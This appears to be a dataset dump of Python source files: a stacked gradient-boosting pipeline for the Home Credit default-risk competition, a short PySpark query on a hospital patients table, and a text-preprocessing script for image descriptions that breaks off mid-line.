pd.read_csv('POS_CASH_balance.csv')\n pos, cat_cols = one_hot_encoder(pos, nan_as_category= True)\n \n pos['SK_DPD_6_months'] = 0 \n pos.loc[pos.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_6_months'] = pos.loc[pos.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD'] \n \n pos['SK_DPD_DEF_6_months'] = 0 \n pos.loc[pos.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_DEF_6_months'] = pos.loc[pos.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_DEF'] \n \n # Features\n aggregations = {\n 'MONTHS_BALANCE': ['max', 'mean', 'size'],\n 'SK_DPD': ['max', 'mean'],\n 'SK_DPD_DEF': ['max', 'mean'],\n 'SK_DPD_6_months': ['max','mean'],\n 'SK_DPD_DEF_6_months': ['max', 'mean'],\n 'CNT_INSTALMENT': ['min', 'max', 'mean', 'sum'],\n 'CNT_INSTALMENT_FUTURE': ['min', 'max', 'mean', 'sum']\n }\n \n for cat in cat_cols:\n aggregations[cat] = ['mean', 'sum']\n \n \n pos_agg = pos.groupby('SK_ID_CURR').agg(aggregations)\n pos_agg.columns = pd.Index(['POS_' + e[0] + \"_\" + e[1].upper() for e in pos_agg.columns.tolist()])\n pos_agg = pos_agg.reset_index()\n\n pos_dpd_slope = pos.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'SK_DPD'].apply(linear_fit)\n pos_dpd_slope = pos_dpd_slope.reset_index()\n pos_dpd_slope.columns = ['SK_ID_CURR', 'POS_DPD_SLOPE']\n \n pos_agg = pd.merge(pos_agg, pos_dpd_slope, on='SK_ID_CURR', how='left')\n \n pos_dpd_def_slope = pos.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'SK_DPD_DEF'].apply(linear_fit)\n pos_dpd_def_slope = pos_dpd_def_slope.reset_index()\n pos_dpd_def_slope.columns = ['SK_ID_CURR', 'POS_DPD_DEF_SLOPE']\n \n pos_agg = pd.merge(pos_agg, pos_dpd_def_slope, on='SK_ID_CURR', how='left')\n\n del pos, pos_dpd_slope, pos_dpd_def_slope\n gc.collect()\n \n return pos_agg\n\n\ndef add_pos_cash_features(df, important_columns, mode):\n pos_cash_features = get_pos_cash_features()\n df = pd.merge(df, pos_cash_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(pos_cash_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n######################################################\n# Preprocess credit_card_balance.csv\n######################################################\ndef get_credit_card_balance_features():\n cc = pd.read_csv('credit_card_balance.csv')\n cc, cat_cols = one_hot_encoder(cc, nan_as_category= True)\n \n cc['OVER_DRAFT'] = cc['AMT_TOTAL_RECEIVABLE']/cc['AMT_CREDIT_LIMIT_ACTUAL']\n cc['OVER_PAYMENT'] = cc['AMT_PAYMENT_CURRENT']/cc['AMT_INST_MIN_REGULARITY']\n cc['INTEREST'] = cc['AMT_TOTAL_RECEIVABLE']/cc['AMT_RECEIVABLE_PRINCIPAL']\n \n \"\"\"\n cc['SK_DPD_6_months'] = 0 \n cc.loc[cc.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_6_months'] = cc.loc[cc.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD'] \n \n cc['SK_DPD_DEF_6_months'] = 0 \n cc.loc[cc.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_DEF_6_months'] = cc.loc[cc.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_DEF'] \n \"\"\"\n \n # General aggregations\n cc.drop(['SK_ID_PREV'], axis= 1, inplace = True)\n cc_agg = cc.groupby('SK_ID_CURR').agg(['min', 'max', 'mean', 'sum', 'var'])\n cc_agg.columns = pd.Index(['CC_' + e[0] + \"_\" + e[1].upper() for e in cc_agg.columns.tolist()])\n \n # Count credit card lines\n cc_agg['CC_COUNT'] = cc.groupby('SK_ID_CURR').size()\n cc_agg = cc_agg.reset_index() \n \n cc_over_draft_slope = cc.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'OVER_DRAFT'].apply(linear_fit)\n cc_over_draft_slope = cc_over_draft_slope.reset_index()\n cc_over_draft_slope.columns = ['SK_ID_CURR', 'CC_OVER_DRAFT_SLOPE']\n \n cc_agg = pd.merge(cc_agg, cc_over_draft_slope, on='SK_ID_CURR', how='left')\n\n cc_over_payment_slope = cc.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'OVER_PAYMENT'].apply(linear_fit)\n cc_over_payment_slope = cc_over_payment_slope.reset_index()\n cc_over_payment_slope.columns = ['SK_ID_CURR', 'CC_OVER_PAYMENT_SLOPE']\n \n cc_agg = pd.merge(cc_agg, cc_over_payment_slope, on='SK_ID_CURR', how='left')\n \n cc_interest_slope = cc.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'INTEREST'].apply(linear_fit)\n cc_interest_slope = cc_interest_slope.reset_index()\n cc_interest_slope.columns = ['SK_ID_CURR', 'CC_INTEREST_SLOPE']\n \n cc_agg = pd.merge(cc_agg, cc_interest_slope, on='SK_ID_CURR', how='left')\n \n \n del cc\n gc.collect()\n \n return cc_agg\n\ndef add_credit_card_balance_features(df, important_columns, mode):\n credit_card_balance = get_credit_card_balance_features()\n df = pd.merge(df, credit_card_balance, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(credit_card_balance.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n \n#########################################################\n# Preprocess installments_payments.csv\n########################################################\ndef get_installments_payments_features():\n ins = pd.read_csv('installments_payments.csv')\n ins, cat_cols = one_hot_encoder(ins, nan_as_category= True)\n\n # Percentage and difference paid in each installment (amount paid and installment value)\n ins['PAYMENT_PERC'] = 0\n ins.loc[ins['AMT_INSTALMENT'] !=0, 'PAYMENT_PERC'] = ins.loc[ins['AMT_INSTALMENT'] !=0, 'AMT_PAYMENT'] / ins.loc[ins['AMT_INSTALMENT'] !=0, 'AMT_INSTALMENT']\n \n ins['PAYMENT_DIFF'] = ins['AMT_INSTALMENT'] - ins['AMT_PAYMENT']\n # Days past due and days before due (no negative values)\n ins['DPD'] = ins['DAYS_ENTRY_PAYMENT'] - ins['DAYS_INSTALMENT']\n ins['DBD'] = ins['DAYS_INSTALMENT'] - ins['DAYS_ENTRY_PAYMENT']\n ins['DPD'] = ins['DPD'].apply(lambda x: x if x > 0 else 0)\n ins['DBD'] = ins['DBD'].apply(lambda x: x if x > 0 else 0)\n \n # number of less payments done\n ins['NLP_Y'] = ins['PAYMENT_DIFF'].apply(lambda x: 1 if x > 0 else 0)\n ins['DPD_Y'] = ins['DPD'].apply(lambda x: 1 if x > 0 else 0)\n ins['DBD_Y'] = ins['DBD'].apply(lambda x: 1 if x > 0 else 0)\n \n ins['DPD_400'] = 0 \n ins.loc[ins.DAYS_INSTALMENT >= -400, 'DPD_400'] = ins.loc[ins.DAYS_INSTALMENT >= -400, 'DPD'] \n \n ins['DPD_800'] = 0\n ins.loc[ins.DAYS_INSTALMENT >= -800, 'DPD_800'] = ins.loc[ins.DAYS_INSTALMENT >= -800, 'DPD'] \n \n # Features: Perform aggregations\n aggregations = {\n 'NUM_INSTALMENT_VERSION': ['nunique'],\n 'DPD': ['max', 'mean', 'sum'],\n 'DBD': ['max', 'mean', 'sum'],\n 'DPD_400': ['max', 'mean', 'sum'],\n 'DPD_800': ['max', 'mean', 'sum'],\n # 'NLP_Y': ['max', 'mean', 'sum'],\n # 'DPD_Y': ['max', 'mean', 'sum'],\n # 'DBD_Y': ['max', 'mean', 'sum'],\n 'PAYMENT_PERC': ['max', 'mean', 'sum', 'var'],\n 'PAYMENT_DIFF': ['max', 'mean', 'sum', 'var'],\n 'AMT_INSTALMENT': ['max', 'mean', 'sum'],\n 'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'DAYS_ENTRY_PAYMENT': ['max', 'mean', 'sum']\n }\n\n for cat in cat_cols:\n aggregations[cat] = ['mean', 'sum']\n \n ins_agg = ins.groupby('SK_ID_CURR').agg(aggregations)\n ins_agg.columns = pd.Index(['INSTALL_' + e[0] + \"_\" + e[1].upper() for e in ins_agg.columns.tolist()])\n # Count installments accounts\n ins_agg['INSTAL_COUNT'] = ins.groupby('SK_ID_CURR').size()\n ins_agg = ins_agg.reset_index()\n\n ins_slope = ins[~ins.DAYS_ENTRY_PAYMENT.isnull()].groupby('SK_ID_CURR')['DAYS_ENTRY_PAYMENT', 'DPD'].apply(linear_fit)\n ins_slope = ins_slope.reset_index()\n ins_slope.columns = ['SK_ID_CURR', 'INSTALL_DPD_SLOPE']\n \n ins_agg = pd.merge(ins_agg, ins_slope, on='SK_ID_CURR', how='left')\n \n del ins\n gc.collect()\n \n return ins_agg\n\ndef add_installments_payments_features(df, important_columns, mode):\n installments_payments_features = get_installments_payments_features()\n df = pd.merge(df, installments_payments_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(installments_payments_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n#########################################\n# split train dev sets\n#########################################\ndef get_train_dev_data(application_train, y_true, important_columns):\n \n train_all_skid, dev_all_skid, dev_eyeball_skid = get_train_dev_sets()\n X_train = application_train.loc[application_train.SK_ID_CURR.isin(train_all_skid), important_columns].fillna(0)\n y_train = y_true.loc[y_true.SK_ID_CURR.isin(train_all_skid), 'TARGET']\n X_dev = application_train.loc[application_train.SK_ID_CURR.isin(dev_all_skid), important_columns].fillna(0)\n y_dev = y_true.loc[y_true.SK_ID_CURR.isin(dev_all_skid), 'TARGET']\n\n return X_train, y_train,X_dev, y_dev\n\n\nclass SklearnWrapper(object):\n def __init__(self, clf, seed=0, params=None):\n params['random_state'] = seed\n self.clf = clf(**params)\n\n def train(self, x_train, y_train):\n self.clf.fit(x_train, y_train)\n\n def predict(self, x):\n return self.clf.predict_proba(x)[:,1]\n \nclass LightGBMWrapper(object):\n def __init__(self, clf, seed=0, params=None):\n params['feature_fraction_seed'] = seed\n params['bagging_seed'] = seed\n self.clf = clf(**params)\n\n def train(self, x_train, y_train):\n self.clf.fit(x_train, y_train)\n\n def predict(self, x):\n return self.clf.predict_proba(x)[:,1]\n\n\nclass XgbWrapper(object):\n def __init__(self, seed=0, params=None):\n self.param = params\n self.param['seed'] = seed\n self.nrounds = params.pop('nrounds', 250)\n\n def train(self, x_train, y_train):\n dtrain = xgb.DMatrix(x_train, label=y_train)\n self.gbdt = xgb.train(self.param, dtrain, self.nrounds, verbose_eval=True)\n\n def predict(self, x):\n return self.gbdt.predict(xgb.DMatrix(x))\n\n\ndef get_oof(clf, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test):\n ntrain = X_train.shape[0]\n ndev = X_dev.shape[0]\n ntest = application_test.shape[0]\n\n oof_train = np.zeros((ntrain,))\n oof_dev = np.zeros((ndev,))\n oof_dev_skf = np.empty((NFOLDS, ndev))\n oof_test = np.zeros((ntest,))\n oof_test_skf = np.empty((NFOLDS, ntest))\n\n for i, (train_index, test_index) in enumerate(kf.split(X_train, y_train)):\n x_tr = X_train.iloc[train_index]\n y_tr = y_train.iloc[train_index]\n x_te = X_train.iloc[test_index]\n\n clf.train(x_tr, y_tr)\n\n oof_train[test_index] = clf.predict(x_te)\n oof_dev_skf[i, :] = clf.predict(X_dev)\n oof_test_skf[i, :] = clf.predict(application_test)\n\n oof_test[:] = oof_test_skf.mean(axis=0)\n oof_dev[:] = oof_dev_skf.mean(axis=0)\n\n return oof_train.reshape(-1, 1), oof_dev.reshape(-1, 1), oof_test.reshape(-1, 1)\n\ndef GBC_train(X_train, y_train, X_dev, y_dev, estimators):\n clf = GradientBoostingClassifier(n_estimators=estimators, random_state=0)\n clf.fit(X_train, y_train)\n\n ###################################################\n # results on the train set\n ###################################################\n \n y_train_predict = clf.predict(X_train)\n y_train_predict_proba = clf.predict_proba(X_train)\n \n scores_df = get_scores(y_train, y_train_predict, y_train_predict_proba[:, 1], 'train')\n \n ###################################################\n # results on the dev set\n ###################################################\n \n y_dev_predict = clf.predict(X_dev)\n y_dev_predict_proba = clf.predict_proba(X_dev)\n \n # get dev scores\n scores_df = scores_df.append(get_scores(y_dev, y_dev_predict, y_dev_predict_proba[:, 1], 'test'))\n \n return clf, scores_df\n\ndef LGBM_train_cv(application_train, usecols, params, dropcols, model, version, desc, algo, estimators):\n dtrain = lgb.Dataset(application_train[usecols].drop(dropcols, axis=1), application_train['TARGET'])\n eval_ = lgb.cv(params,\n dtrain,\n nfold=5,\n stratified=True,\n num_boost_round=20000,\n early_stopping_rounds=200,\n metrics='auc',\n verbose_eval=100,\n seed = 5,\n show_stdv=True)\n \n with open('all_reasults.csv', 'a') as f:\n spamwriter = csv.writer(f)\n spamwriter.writerow([model,\n version,\n desc,\n algo,\n algo+\"(n_estimators=\"+str(estimators)+\" random_state=0)\",\n str(round(max(eval_['auc-mean']), 4)),'',\n '','',\n '','',\n \"NA\",\"NA\",\"dev set\",\n '','',\n '','',\n '',''])\n \n return max(eval_['auc-mean'])\n \n\ndef LGBM_train(X_train, y_train, X_dev, y_dev, estimators):\n clf = LGBMClassifier(\n nthread=8,\n n_estimators=10000,\n learning_rate=0.02,\n num_leaves=34,\n colsample_bytree=0.9497036,\n subsample=0.8715623,\n max_depth=8,\n reg_alpha=0.041545473,\n reg_lambda=0.0735294,\n min_split_gain=0.0222415,\n min_child_weight=39.3259775,\n silent=-1,\n verbose=-1, )\n \n clf.fit(X_train, y_train, eval_set=[(X_train, y_train), (X_dev, y_dev)], eval_metric= 'auc', verbose= 100, early_stopping_rounds= 200)\n\n ###################################################\n # results on the train set\n ###################################################\n \n y_train_predict_proba = clf.predict_proba(X_train, num_iteration=clf.best_iteration)\n y_train_predict = (y_train_predict_proba[:, 1] > 0.5)*1 \n \n scores_df = get_scores(y_train, y_train_predict, y_train_predict_proba[:, 1], 'train')\n \n ###################################################\n # results on the dev set\n ###################################################\n y_dev_predict_proba = clf.predict_proba(X_dev, num_iteration=clf.best_iteration)\n y_dev_predict = (y_dev_predict_proba[:, 1] > 0.5)*1 \n\n # get dev scores\n scores_df = scores_df.append(get_scores(y_dev, y_dev_predict, y_dev_predict_proba[:, 1], 'test'))\n \n return clf, scores_df\n \n\n#########################################\n# split train dev sets and train \n#########################################\ndef train_model(application_train, y_true, important_columns, model, version, estimators, desc, algo='GBC'):\n X_train, y_train, X_dev, y_dev = get_train_dev_data(application_train, y_true, important_columns)\n \n del application_train, y_true\n gc.collect()\n \n if algo == 'LGB':\n clf, scores_df = LGBM_train(X_train, y_train, X_dev, y_dev, estimators)\n else:\n clf, scores_df = GBC_train(X_train, y_train, X_dev, y_dev, estimators)\n\n with open('all_reasults.csv', 'a') as f:\n #f.write(model+\",\"+version+\",\"+\"GBC trained only on important columns of application data with dev set CV adding bureau features\"+\",\"+\"GradientBoostingClassifier\"+\",\"+str(clf)+\",\"+str(round(scores_df['test_roc_auc'], 4))+\",\"+str(round(scores_df['test_accuracy'], 4))+\",\"+str(round(scores_df['test_recall'], 4))+\",\"+str(round(scores_df['test_fpr'], 4))+\",\"+str(round(scores_df['test_precision'], 4))+\",\"+ str(round(scores_df['test_f1'], 4))+\",\"+\"NA\"+\",\"+\"NA\"+\",\"+\"dev set\"+\",\"+str(round(scores_df['train_roc_auc'], 4))+\",\"+str(round(scores_df['train_accuracy'], 4))+\",\"+str(round(scores_df['train_recall'], 4))+\",\"+str(round(scores_df['train_fpr'], 4))+\",\"+str(round(scores_df['train_precision'], 4))+\",\"+ str(round(scores_df['train_f1'], 4))+\"\\n\")\n\n spamwriter = csv.writer(f)\n spamwriter.writerow([model,\n version,\n desc,\n algo,\n algo+\"(n_estimators=\"+str(estimators)+\" random_state=0)\",\n str(round(scores_df['test_roc_auc'], 4)),str(round(scores_df['test_accuracy'], 4)),\n str(round(scores_df['test_recall'], 4)),str(round(scores_df['test_fpr'], 4)),\n str(round(scores_df['test_precision'], 4)),str(round(scores_df['test_f1'], 4)),\n \"NA\",\"NA\",\"dev set\",\n str(round(scores_df['train_roc_auc'], 4)),str(round(scores_df['train_accuracy'], 4)),\n str(round(scores_df['train_recall'], 4)),str(round(scores_df['train_fpr'], 4)),\n str(round(scores_df['train_precision'], 4)),str(round(scores_df['train_f1'], 4))])\n\n \n important_features = pd.Series(data=clf.feature_importances_*100,index=X_train.columns)\n return clf,important_features\n\n\n\n###################################################\n# K flod LGB\n###################################################\n# LightGBM GBDT with KFold or Stratified KFold\n# Parameters from Tilii kernel: https://www.kaggle.com/tilii7/olivier-lightgbm-parameters-by-bayesian-opt/code\n\ndef kfold_lightgbm(df, num_folds, submission_file_name, stratified = False, debug= False):\n # Divide in training/validation and test data\n train_df = df[df['TARGET'].notnull()]\n test_df = df[df['TARGET'].isnull()]\n print(\"Starting LightGBM. Train shape: {}, test shape: {}\".format(train_df.shape, test_df.shape))\n del df\n gc.collect()\n \n # Cross validation model\n if stratified:\n folds = StratifiedKFold(n_splits= num_folds, shuffle=True, random_state=1001)\n else:\n folds = KFold(n_splits= num_folds, shuffle=True, random_state=1001)\n \n # Create arrays and dataframes to store results\n oof_preds = np.zeros(train_df.shape[0])\n sub_preds = np.zeros(test_df.shape[0])\n feature_importance_df = pd.DataFrame()\n feats = [f for f in train_df.columns if f not in ['TARGET','SK_ID_CURR','SK_ID_BUREAU','SK_ID_PREV','index']]\n \n for n_fold, (train_idx, valid_idx) in enumerate(folds.split(train_df[feats], train_df['TARGET'])):\n train_x, train_y = train_df[feats].iloc[train_idx], train_df['TARGET'].iloc[train_idx]\n valid_x, valid_y = train_df[feats].iloc[valid_idx], train_df['TARGET'].iloc[valid_idx]\n\n # LightGBM parameters found by Bayesian optimization\n clf = LGBMClassifier(\n nthread=8,\n n_estimators=10000,\n learning_rate=0.02,\n num_leaves=34,\n colsample_bytree=0.9497036,\n subsample=0.8715623,\n max_depth=8,\n reg_alpha=0.041545473,\n reg_lambda=0.0735294,\n min_split_gain=0.0222415,\n min_child_weight=39.3259775,\n random_seed = 42,\n silent=-1,\n verbose=-1, )\n \n clf.fit(train_x, train_y, eval_set=[(train_x, train_y), (valid_x, valid_y)], \n eval_metric= 'auc', verbose= 100, early_stopping_rounds= 200)\n\n oof_preds[valid_idx] = clf.predict_proba(valid_x, num_iteration=clf.best_iteration)[:, 1]\n sub_preds += clf.predict_proba(test_df[feats], num_iteration=clf.best_iteration)[:, 1] / folds.n_splits\n\n fold_importance_df = pd.DataFrame()\n fold_importance_df[\"feature\"] = feats\n fold_importance_df[\"importance\"] = clf.feature_importances_\n fold_importance_df[\"fold\"] = n_fold + 1\n feature_importance_df = pd.concat([feature_importance_df, fold_importance_df], axis=0)\n print('Fold %2d AUC : %.6f' % (n_fold + 1, roc_auc_score(valid_y, oof_preds[valid_idx])))\n del clf, train_x, train_y, valid_x, valid_y\n gc.collect()\n\n\n print('Full AUC score %.6f' % roc_auc_score(train_df['TARGET'], oof_preds))\n oof_preds_pred = (oof_preds > 0.5)*1\n scores_df = get_scores(train_df['TARGET'], oof_preds_pred, oof_preds, 'test')\n print(scores_df)\n \n # Write submission file and plot feature importance\n if not debug:\n test_df['TARGET'] = sub_preds\n test_df[['SK_ID_CURR', 'TARGET']].to_csv(submission_file_name, index= False)\n\n return feature_importance_df\n\n############################################\n# train on all and generate submission file\n############################################\ndef generate_submission_file(clf, application_train, application_test, y_true, important_columns, name):\n X = application_train[important_columns].fillna(0)\n y = y_true['TARGET']\n clf.fit(X, y, eval_metric= 'auc', verbose= 100, early_stopping_rounds= 200)\n \n X_test_predict = application_test[important_columns].fillna(0)\n y_test_predict = clf.predict_proba(X_test_predict, num_iteration=clf.best_iteration_)\n \n submission = pd.DataFrame({'SK_ID_CURR': application_test['SK_ID_CURR'], 'TARGET': y_test_predict[:, 1]})\n submission.to_csv(name, index=False)\n \n\n################################################################\n# try removing random features \n# add new interesting features\n# add stacking\n################################################################\nwith open('whole_df', 'rb') as f:\n whole_df = pickle.load(f)\n\nimportant_columns = list(whole_df.columns)\nimportant_columns.remove('SK_ID_CURR')\nimportant_columns.remove('index')\nimportant_columns.remove('TARGET')\n#important_columns.remove('SK_ID_BUREAU')\n#important_columns.remove('SK_ID_PREV')\n\nmodel= 'model_16'\nversion=0\nestimators=100000\ndesc = \"stacked model trained for all features\", \nalgo = 'LGB XGB RF EXTRATREES'\n\napplication_train = whole_df[whole_df['TARGET'].notnull()]\ny_true = application_train[['SK_ID_CURR', 'TARGET']]\n\napplication_test = whole_df.loc[whole_df['TARGET'].isnull(), important_columns]\n\napplication_train.replace([np.inf, -np.inf], 0, inplace = True)\napplication_test.replace([np.inf, -np.inf], 0, inplace = True)\napplication_test = application_test.fillna(0)\n\nX_train, y_train, X_dev, y_dev = get_train_dev_data(application_train, y_true, important_columns)\n\ndel application_train, y_true, whole_df\ngc.collect()\n \nNFOLDS = 4\nSEED = 0\nkf = StratifiedKFold(n_splits = NFOLDS, shuffle=True, random_state=SEED)\n\net_params = {\n'n_jobs': 16,\n'n_estimators': 200,\n'max_features': 0.5,\n'max_depth': 12,\n'min_samples_leaf': 2,\n'verbose': 10\n}\n\nrf_params = {\n 'n_jobs': 16,\n 'n_estimators': 200,\n 'max_features': 0.2,\n 'max_depth': 12,\n 'min_samples_leaf': 2,\n 'verbose': 10\n\n}\n\nxgb_params = {\n 'seed': 0,\n 'colsample_bytree': 0.7,\n 'silent': 1,\n 'subsample': 0.7,\n 'learning_rate': 0.075,\n 'objective': 'binary:logistic',\n 'max_depth': 4,\n 'num_parallel_tree': 1,\n 'min_child_weight': 1,\n 'nrounds': 200\n}\n\nlightgbm_params = {\n 'nthread':16,\n 'n_estimators':1200,\n 'learning_rate':0.02,\n 'num_leaves':34,\n 'colsample_bytree':0.9497036,\n 'subsample':0.8715623,\n 'max_depth':8,\n 'reg_alpha':0.041545473,\n 'reg_lambda':0.0735294,\n 'min_split_gain':0.0222415,\n 'min_child_weight':39.3259775,\n 'verbose':100, \n}\n\nxg = XgbWrapper(seed=SEED, params=xgb_params)\net = SklearnWrapper(clf=ExtraTreesClassifier, seed=SEED, params=et_params)\nrf = SklearnWrapper(clf=RandomForestClassifier, seed=SEED, params=rf_params)\nlg = LightGBMWrapper(clf = LGBMClassifier, seed = SEED, params = lightgbm_params)\n\nprint('XG')\nxg_oof_train, xg_oof_dev, xg_oof_test = get_oof(xg, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test)\nprint('ET')\net_oof_train, et_oof_dev, et_oof_test = get_oof(et, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test)\nprint('RF')\nrf_oof_train, rf_oof_dev, rf_oof_test = get_oof(rf, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test)\nprint('LG')\nlg_oof_train, lg_oof_dev, lg_oof_test = get_oof(lg, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test)\n\n\nx_train = np.concatenate((xg_oof_train, et_oof_train, rf_oof_train, lg_oof_train), axis=1)\nx_dev = np.concatenate((xg_oof_dev, et_oof_dev, rf_oof_dev, lg_oof_dev), axis=1)\nx_test = np.concatenate((xg_oof_test, et_oof_test, rf_oof_test, lg_oof_test), axis=1)\n\nprint(\"{},{}\".format(x_train.shape, x_test.shape))\n\nlogistic_regression = LogisticRegression()\nlogistic_regression.fit(x_train,y_train)\n\n###################################################\n# results on the train set\n###################################################\n \ny_train_predict = logistic_regression.predict(x_train)\ny_train_predict_proba = logistic_regression.predict_proba(x_train)\n\nscores_df = get_scores(y_train, y_train_predict, y_train_predict_proba[:, 1], 'train')\n \n###################################################\n# results on the dev set\n###################################################\n\ny_dev_predict = logistic_regression.predict(x_dev)\ny_dev_predict_proba = logistic_regression.predict_proba(x_dev)\n\n# get dev scores\nscores_df = scores_df.append(get_scores(y_dev, y_dev_predict, y_dev_predict_proba[:, 1], 'test'))\n\n\nwith open('all_reasults.csv', 'a') as f:\n spamwriter = csv.writer(f)\n spamwriter.writerow([model,\n version,\n desc,\n algo,\n algo+\"(n_estimators=\"+str(estimators)+\" random_state=0)\",\n str(round(scores_df['test_roc_auc'], 4)),str(round(scores_df['test_accuracy'], 4)),\n str(round(scores_df['test_recall'], 4)),str(round(scores_df['test_fpr'], 4)),\n str(round(scores_df['test_precision'], 4)),str(round(scores_df['test_f1'], 4)),\n \"NA\",\"NA\",\"dev set\",\n str(round(scores_df['train_roc_auc'], 4)),str(round(scores_df['train_accuracy'], 4)),\n str(round(scores_df['train_recall'], 4)),str(round(scores_df['train_fpr'], 4)),\n str(round(scores_df['train_precision'], 4)),str(round(scores_df['train_f1'], 4))])\n\napplication_test['TARGET'] = logistic_regression.predict_proba(x_test)[:,1] \napplication_test['SK_ID_CURR'] = whole_df.loc[whole_df['TARGET'].isnull(), 'SK_ID_CURR']\n\napplication_test[['SK_ID_CURR', 'TARGET']].to_csv('submission_22.csv', index=False, float_format='%.8f')\n\n","sub_path":"home_credit_default_risk/models/model_16_stacked.py","file_name":"model_16_stacked.py","file_ext":"py","file_size_in_byte":47280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"317029408","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 17 12:28:00 2021\n\n@author: patilnarayan\n\"\"\"\n\n# importing necessary libraries\nfrom pyspark import SparkContext\nfrom pyspark.sql import SQLContext\n\nsc = SparkContext('local','example') # if using locally\nsqlContext = SQLContext(sc)\n\n# fetching tables from hive tables\ndf=sqlContext.sql(\"select * from hospital.patients\")\n\n# visualization Data\ndf.show()\n\n#customers as per Country \n# India patients extracting\n# change in 'IND' if you want any other country data\ndf.where(df.Country=='IND').show()\n \n","sub_path":"TestDrivenDevelopment.py","file_name":"TestDrivenDevelopment.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"284938977","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 7 11:55:26 2019\n\n@author: wenyi\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nimport re, string\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import wordnet\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize \n\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\n\nfrom sklearn import preprocessing\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn import linear_model\n\n\n# helper function for lemmatization\ndef get_wordnet_pos(word):\n tag = nltk.pos_tag([word])[0][1][0].upper()\n tag_dict = {\"J\": wordnet.ADJ,\n \"N\": wordnet.NOUN,\n \"V\": wordnet.VERB,\n \"R\": wordnet.ADV}\n return tag_dict.get(tag, wordnet.NOUN)\n\n\ndef pre_process_data(data):\n stop_words = set(stopwords.words('english'))\n lemmatizer = WordNetLemmatizer()\n\n new_data = []\n for i in range(len(data)):\n review = data[i]\n # convert to lowercase\n review = review.lower()\n\n # add whiltespace after punctuation\n review = re.sub( r'([a-zA-Z])([,.!])', r'\\1\\2 ', review)\n\n # remove punctuation\n review = review.translate(string.maketrans(\"\",\"\"), string.punctuation)\n\n filtered_review = \"\" \n for w in word_tokenize(review):\n# print(w)\n# print(get_wordnet_pos(w))\n if get_wordnet_pos(w) == \"v\":\n# print(\"discard verb\")\n continue\n\n # Lemmatize with POS Tag\n try:\n w = lemmatizer.lemmatize(w, get_wordnet_pos(w))\n except:\n # fiancé, café, crêpe, puréed\n # w = unidecode.unidecode(unicode(w, \"utf-8\"))\n continue\n \n # remove stop word\n if w not in stop_words:\n filtered_review =filtered_review + w + \" \"\n\n review = filtered_review\n new_data.append(review) \n\n return np.array(new_data)\n\n\n# \"train\" \"test\"\ndef load_description_data(data, size):\n \"\"\" \n load description data\n -----------\n \n Parameters\n -----------\n data: \"train\" / \"test\"\n size: int\n \n \n Return\n -----------\n 5-sentences data after removing stop words and lemmatizing \n \"\"\"\n \n path = \"./data/descriptions_\" + data + \"/\"\n temp = []\n \n for i in range(size):\n file_name = str(i) + '.txt'\n file_path = path + file_name\n des = \"\"\n with open(file_path) as f:\n for line in f.readlines():\n des = des + (line.strip('\\n')) + ' '\n temp.append(des)\n \n result = np.array(pre_process_data(temp))\n savepath = data + \"_des.csv\"\n np.savetxt(savepath, result, fmt='%s')\n return result\n\n\ndef build_description_feature(data):\n \"\"\" \n build feature vectors\n -----------\n \n Parameters\n -----------\n data: \"train\" / \"test\" \n \n Return\n -----------\n normalized feature vectors \n \"\"\"\n \n temp_dict = {}\n temp_dict[\"train\"] = training_data\n temp_dict[\"test\"] = testing_data\n \n temp = []\n for i in range(len(temp_dict[data])):\n # initialize a vector of size (1*6719) \n review_vector = np.zeros(len(word_dict))\n review = temp_dict[data][i]\n \n for w in word_tokenize(review):\n if w in word_dict:\n index = word_dict.keys().index(w)\n review_vector[index] += 1 \n \n temp.append(review_vector)\n \n temp = np.array(temp)\n temp = preprocessing.normalize(temp, norm='l2') \n return temp\n\n\n##########################################################\n# Descrptions features (data)\n##########################################################\n\n# training_data = load_description_data(\"train\", 10000)\n# testing_data = load_description_data(\"test\", 2000)\n\ntraining_data_df = pd.read_csv('./train_des.csv', header=None)\ntesting_data_df = pd.read_csv('./test_des.csv', header=None)\n\ntraining_data = []\ntesting_data = []\n\nfor row in training_data_df.iterrows():\n training_data.append(\" \".join(row[1]))\nfor row in 